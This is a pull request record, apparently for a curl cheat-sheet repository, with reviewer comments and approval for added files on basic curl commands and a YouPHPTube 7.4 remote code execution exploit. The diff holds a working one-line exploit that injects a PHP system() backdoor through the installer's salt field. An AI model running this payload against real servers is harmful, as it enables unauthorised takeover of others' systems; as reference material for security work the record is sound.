### PR TITLE
added Basic Curl CMD's & YouPHPtube Exploit

### PR DESCRIPTION
**Pull request by r0b0tG4nG**

### CODE REVIEW

File: categories/avideo-exploit.md [hunk 1]
```diff
@@ -0,0 +1,10 @@
+## YouPHPTube 7.4  Remote Code Execution
```
Comment (proditis) [inline categories/avideo-exploit.md]: Can we rename this into the CVE that this exploits and add the application and vendor details as "tags" ?

File: categories/avideo-exploit.md [hunk 2]
```diff
@@ -0,0 +1,10 @@
+## YouPHPTube 7.4  Remote Code Execution 
+
+```sh
+curl -s "http://put-ip-here/install/checkConfiguration.php" --data "contactEmail=fake-email@fake.com&createTables=2&mainLanguage=RCE&salt=';system(\$_GET['bots']);echo '&systemAdminPass=zerodays.LOL&systemRootPath=/var/www/html/&webSiteRootURL=/var/www/html/&webSiteTitle=Site-Title-Here&databaseHost=127.0.0.1&databaseName=Any-DBname-Here&databasePass=&databasePort=3306&databaseUser=root" 
+```
```
Comment (proditis) [inline categories/avideo-exploit.md]: explain what this does so that the next line with the example makes sense.

File: categories/basic-curls.md [hunk 3]
```diff
@@ -0,0 +1,142 @@
+# Useful Curl commands
```
Comment (proditis) [inline categories/basic-curls.md]: Rename file to 00-basics.md

**Review by proditis — COMMENTED** [review]
Awesome work buddy, can you please take care of the 3 comments?

File: categories/avideo-exploit.md (hunk 2 above)
Comment (r0b0tG4nG) [reply categories/avideo-exploit.md]: done

File: categories/basic-curls.md (hunk 3 above)
Comment (r0b0tG4nG) [reply categories/basic-curls.md]: done

**Review by proditis — APPROVED** [review]

**Pull request merged**